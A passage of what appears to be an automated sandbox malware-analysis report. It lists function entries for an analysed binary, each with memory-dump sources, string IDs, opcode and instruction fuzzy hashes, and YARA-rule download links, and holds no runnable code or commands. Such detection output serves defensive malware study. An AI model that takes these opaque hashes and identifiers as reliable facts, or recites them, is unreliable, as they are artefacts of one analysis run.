                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ?$__ZN
                                    • API String ID: 0-1427190319
                                    • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction ID: df57c92ffbbaaf836300418b122df1e174fa889119e4f51739364635e8452d10
                                    • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                    • Instruction Fuzzy Hash: 35721472908B189BD758CF14C88067EB7E2EFC5310F698A1DF7A59B291D3709D419B83
                                    Function 010693ED Relevance: 2.7, Strings: 2, Instructions: 220COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ..SU$]&{
                                    • API String ID: 0-2871126607
                                    • Opcode ID: 56586d9c265e90fdffa121b3326b3278686dfd9cbc814d5fcb8befcb0f981989
                                    • Instruction ID: d1abb78093d97cbe0e129b8d5624be74c17342a99274a10b21c8963294606382
                                    • Opcode Fuzzy Hash: 56586d9c265e90fdffa121b3326b3278686dfd9cbc814d5fcb8befcb0f981989
                                    • Instruction Fuzzy Hash: C06124B3F053145BF304693DDC8976AB6DBEBD4720F2B423DDA98C7788E87959068281
                                    Function 00CD5DB9 Relevance: 2.5, Strings: 1, Instructions: 1234COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: xn--
                                    • API String ID: 0-2826155999
                                    • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction ID: 032fa65e01885c8d865ae809bbbdbc338732935a492d9f194d0941e970f44846
                                    • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                    • Instruction Fuzzy Hash: 16A2F2B1C042688AEF28CB68C8903FDB7B1EF55300F1842ABD6667B381D7759E85DB51
                                    Function 010D98B6 Relevance: 2.2, Strings: 1, Instructions: 913COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: vO8L
                                    • API String ID: 0-2082692065
                                    • Opcode ID: f9f2ef91de3240cf8e40815d694b614697876964ea59b833abdc28db95cc2a5e
                                    • Instruction ID: 3a3261d6bf867340b2da7e750177779ac00882dfa6180d5b5f806b31bd2d9bac
                                    • Opcode Fuzzy Hash: f9f2ef91de3240cf8e40815d694b614697876964ea59b833abdc28db95cc2a5e
                                    • Instruction Fuzzy Hash: 3C52A0F290C200AFE704AF29EC8567AFBE5EF94720F16892DE6C5C7340E63558058B97
                                    Function 00CD4DC8 Relevance: 1.9, APIs: 1, Instructions: 411COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID:
                                    • API String ID: 3732870572-0
                                    • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                    • Instruction ID: 0b9c89096f924be9cbacc172bf32d063af9e787c30f28619ecd15616ee6f5154
                                    • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                    • Instruction Fuzzy Hash: AEE1C0316083459FC725DF28C8817AFB7E2EF89300F55492EE6D99B391D731A945CB82
                                    Function 00CD4868 Relevance: 1.9, APIs: 1, Instructions: 400COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: __aulldiv
                                    • String ID:
                                    • API String ID: 3732870572-0
                                    • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                    • Instruction ID: ab48607753de3340dce1f85d36bea82252308d0fc7aba2cb24d6db18d3bae536
                                    • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                    • Instruction Fuzzy Hash: A9E1D331A087019FCB28CF18C8917AEB7E6EFC4310F15892EEA999B351D730ED459B46
                                    Function 00CEE258 Relevance: 1.6, Strings: 1, Instructions: 383COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: UNC\
                                    • API String ID: 0-505053535
                                    • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                    • Instruction ID: da4149c1a73925b6df34fd458be5647bf2b9883985fa1bb981579dd2c5304295
                                    • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                    • Instruction Fuzzy Hash: 70E12B71D042E58EEB10CF5BC8843BEBBE2AB85394F198169D4745F2D2D7358E46CB90
                                    Function 0108C295 Relevance: 1.5, Strings: 1, Instructions: 208COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: n7n3
                                    • API String ID: 0-2671217414
                                    • Opcode ID: afb6eda262a34992c7f884b8acacea64f8b886a4825b553ec5bf52d0d15f56f7
                                    • Instruction ID: 411346a566322bd32bfd7bcf2ebe26c0d5c8e80e94d52f2638925ac989dc843e
                                    • Opcode Fuzzy Hash: afb6eda262a34992c7f884b8acacea64f8b886a4825b553ec5bf52d0d15f56f7
                                    • Instruction Fuzzy Hash: 3E6115B3A082009FE304AA3DDC8572AF7E5EF94720F1A463DE6D8C3780E63599058657
                                    Function 00F82CA0 Relevance: 1.4, Strings: 1, Instructions: 162COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: J__\
                                    • API String ID: 0-3992146572
                                    • Opcode ID: 77e58c92b35a9794beeb709cc6ac4b40c4ad0ab097e04aa14bcd90f716aa6f10
                                    • Instruction ID: 19520fa88630ec8cf6c30c14b76c4b0f08602c25c9e663d74924f2f1d3307899
                                    • Opcode Fuzzy Hash: 77e58c92b35a9794beeb709cc6ac4b40c4ad0ab097e04aa14bcd90f716aa6f10
                                    • Instruction Fuzzy Hash: 3B414CF3A081049FF305AE29EC45B6BB7DADBD4720F1AC53DEB8493784E939580582D6
                                    Function 010169F1 Relevance: 1.4, Strings: 1, Instructions: 150COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: n/}:
                                    • API String ID: 0-2503049464
                                    • Opcode ID: 8e55d0798f51669f89c8c199a6059cec4c08e50042e0774ce4d29c8b7aeb5933
                                    • Instruction ID: 1bd2ea06ba29c529692173988eb825f4a0b67650eef04a2a53e3eb9175ed95cc
                                    • Opcode Fuzzy Hash: 8e55d0798f51669f89c8c199a6059cec4c08e50042e0774ce4d29c8b7aeb5933
                                    • Instruction Fuzzy Hash: F44145F3E092045BE3146E2EDC4476AFBE6DBD0720F1B453DDB8893794E8394C098696
                                    Function 00CAE544 Relevance: .8, Instructions: 823COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103557076.000000000120D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103687575.00000000013A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2103705828.00000000013AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_c80000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                    • Instruction ID: f30058f55679b7832187fa2e12e586bce0c075066831b04cf0a387f4c2ae98c7
                                    • Opcode Fuzzy Hash: e82fb53e6e33c1c46d6227b86d57e629e491dcb0a26417ee9a3c8d3f310dc386
                                    • Instruction Fuzzy Hash: 4182F1B5900F458FD765CF29C880B92B7F1BF4A304F548A2ED9EA8B651DB30B945CB90
                                    Function 00CC8E78 Relevance: .6, Instructions: 649COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2102193900.0000000000CAC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
                                    • Associated: 00000000.00000002.2102046137.0000000000C80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000C81000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000DEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102193900.0000000000F56000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.0000000000F6A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000010F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011D3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2102954892.000000000120C000.00000040.00000001.01000000.00000003.sdmpDownload File
